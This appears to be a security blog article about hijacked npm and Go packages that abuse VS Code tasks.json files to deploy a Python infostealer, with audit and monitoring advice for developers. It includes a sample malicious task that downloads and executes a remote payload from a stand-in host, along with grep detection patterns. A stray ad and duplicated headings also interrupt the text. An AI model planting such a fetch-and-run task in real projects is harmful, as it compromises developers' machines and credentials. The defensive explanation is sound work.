Hijacked npm and Go Packages Use VS Code Tasks to: What Security Teams Need to Check
Hijacked npm and Go Packages Exploit VS Code Tasks to Deploy Python Infostealer Security researchers have identified a new supply chain attack targeting
Hijacked Npm and Go Packages Exploit Vs Code Tasks to Deploy Python Infostealer
Security researchers have identified a new supply chain attack targeting developers through hijacked npm and Go packages. The attack bypasses common npm execution paths,such as lifecycle scripts,and instead abuses Visual Studio Code (VS Code) tasks to deploy a Python-based information stealer on Windows, Linux, and macOS systems. This method could affect developers using VS Code for package management or automated workflows.
The attack highlights a growing trend: threat actors increasingly exploit developer tools and workflows to evade detection. Understanding how this works, how to protect against it, and what to test in your own environment is critical for anyone working with JavaScript, Go, or Python projects.
How the Attack Works
The attack chain begins with compromised npm and Go packages. When a developer installs these packages, they trigger a VS Code task configuration file (.vscode/tasks.json). This file is designed to automate build, test, or deployment steps,but in this case, it executes malicious Python code that installs an infostealer.
Key Technical Details
- Avoiding Lifecycle Scripts
Traditional npm supply chain attacks often rely on postinstall or preinstall scripts in package.json. This attack skips those paths entirely, instead targeting VS Code’s task automation system. According to the report:
"The attackers crafted malicious tasks.json files that execute arbitrary Python code when the package is installed or used in a VS Code project."This means even developers who avoid running arbitrary scripts during npm install could still be at risk if they use VS Code for development.
- Python Infostealer Deployment
The malicious task runs a Python script that:
- Downloads additional payloads from a remote server.
- Collects system information (browser cookies, credentials, environment variables).
- Exfiltrates data to a command-and-control server.
The use of Python makes this attack particularly stealthy, as Python is commonly used for legitimate automation in development workflows.
- Cross-Platform Targeting
The attack works on Windows, Linux, and macOS, likely because:
- VS Code is cross-platform.
- Python is preinstalled on many systems or easily installed via package managers.
Why This Matters for Developers
This attack is a reminder that security risks extend beyond code execution,they now include developer tooling, configuration files, and automation workflows. Here’s what developers should focus on:
CodeQuest turns coding into a survival game. Master Python, JavaScript, SQL, and AI/ML through missions, boss fights, and faction warfare. Your character dies if you stop coding.
Supply Chain Risks Are Evolving
- Before: Attackers relied on
npm installscripts or malicious dependencies. - Now: Attackers target IDE-specific configurations (like
.vscode/tasks.json), CI/CD pipelines, and other automated workflows.
This shift means developers must audit not just their dependencies, but also their tooling and automation scripts.
Vs Code Tasks Are a New Attack Surface
VS Code tasks are designed for automation, but they can also execute arbitrary code. If a malicious package installs or modifies a tasks.json file, it could run unseen scripts during development.
Example of a legitimate tasks.json:
{
"version": "2.0.0",
"tasks": [
{
"label": "Build",
"type": "shell",
"command": "npm run build",
"group": {
"kind": "build",
"isDefault": true
}
}
]
}A malicious version might include:
{
"version": "2.0.0",
"tasks": [
{
"label": "Build",
"type": "shell",
"command": "python3 -c 'import urllib.request. urllib.request.urlretrieve(\"https://malicious.com/payload.py\", \"payload.py\"). exec(open(\"payload.py\").read())'",
"group": {
"kind": "build",
"isDefault": true
}
}
]
}The second example executes Python code that fetches and runs a remote payload.
Python As a Stealthy Attack Vector
Python is widely used in development, and its scripts can blend in with legitimate automation. Attackers may use Python because:
- It’s often preinstalled on developer machines.
- It’s less likely to trigger antivirus alerts compared to compiled binaries.
- It can be obfuscated or dynamically generated to evade static analysis.
How to Test to Test and Protect Your Environment
How to Test to Test and Protect Your Environment
Developers can take immediate steps to reduce their risk. Below are actionable tests and configurations.
Audit Your.vscode/tasks.json Files
- Check if any
tasks.jsonfiles in your project contain suspicious commands. - Look for:
python,curl,wget, orpowershellcommands fetching remote scripts.- Base64-encoded payloads or obfuscated code.
- Example command to search for suspicious patterns:
grep -r "python.*urllib\|curl.*malicious\|wget.*exec".vscode/Disable Unnecessary Task Automation
- If you don’t use VS Code tasks, disable them in your workspace:
//.vscode/settings.json
{
"tasks.autodetect": "off",
"tasks.enableAutomationTasks": false
}- This prevents malicious tasks from running automatically.
Verify Package Integrity
- Use
npm auditor tools like Dependabot to check for known malicious packages. - For Go packages, use
go list -m allto inspect dependencies and cross-reference with Go’s vulnerability database.
Test a Safe Environment
- Set up a disposable VM or container to test suspicious packages:
Example Using Docker to Test a Package in Isolation
docker run -it --rm -v $(pwd):/app node:18 npm install <suspicious-package>- Monitor for unexpected network connections or file modifications.
Monitor for Unusual Activity
- Use tools like
lsof,netstat, orhtopto check for unexpected processes:
Check for Suspicious Python Processes
ps aux | grep python- Look for connections to unfamiliar domains:
lsof -i | grep ESTABLISHEDKnown Risks and Limits
What’s Unproven or Unclear
- Attack Scope: The report mentions "a cluster of Go packages," but the exact number and names of affected packages are not disclosed. Developers should assume similar attacks could target other languages or tools.
- Detection Evasion: The Python infostealer may use techniques like process injection or living-off-the-land binaries (LOLBins) to avoid detection. Without access to the malware sample, the full evasion tactics are unknown.
- Long-Term Impact: It’s unclear how widely this attack has spread or whether it’s part of a larger campaign.
Marketing and Hype Risks
- Overstating Threat Levels: Not all VS Code tasks are malicious. Most developers use them safely for build automation.
- False Sense of Security: Tools like
npm auditor static analysis can help, but they’re not foolproof. Manual review remains essential.
Adoption Barriers
- Complexity: Auditing
tasks.jsonfiles requires familiarity with VS Code’s task system. - Tooling Gaps: Some organizations lack visibility into developer environments, making it harder to detect such attacks.
- False Positives: Overzealous security measures (e.g., blocking all Python execution) could disrupt legitimate workflows.
What’s Next: Signals to Monitor
Developers and security teams should watch for the following:
Updated Advisories
- npm: Monitor npm’s security advisories for new findings.
- Go: Check Go’s vulnerability database for updates on affected packages.
Tooling Improvements
- VS Code: Microsoft may release updates to detect or block malicious task configurations. Watch the VS Code Insiders blog for announcements.
- Security Scanners: Tools like Snyk, Dependabot, or GitHub CodeQL may add support for detecting malicious task files.
Industry Reports
- Follow cybersecurity firms like Mandiant, Krebs on Security, or The Hacker News for updates on similar attacks.
Developer Community Discussions
- Engage in forums like:
- r/netsec
- Hacker News
- Dev.to Security Tag
- Share findings and collaborate on detection methods.
Key Takeaways for Developers
- Assume Breach: Treat supply chain attacks as inevitable. Assume any third-party package or tool could be compromised.
- Audit Beyond Code: Review not just your dependencies, but also configuration files (
.vscode/tasks.json,.gitlab-ci.yml,Dockerfile). - Isolate Testing: Use disposable environments (VMs, containers) to test untrusted packages.
- Monitor Behavior: Look for unexpected processes, network connections, or file modifications.
- Stay Updated: Follow security advisories and tooling updates from npm, Go, and VS Code.
Sources
- thehackernews.com. https://thehackernews.com/2026/06/hijacked-npm-and-go-packages-use-vs.html
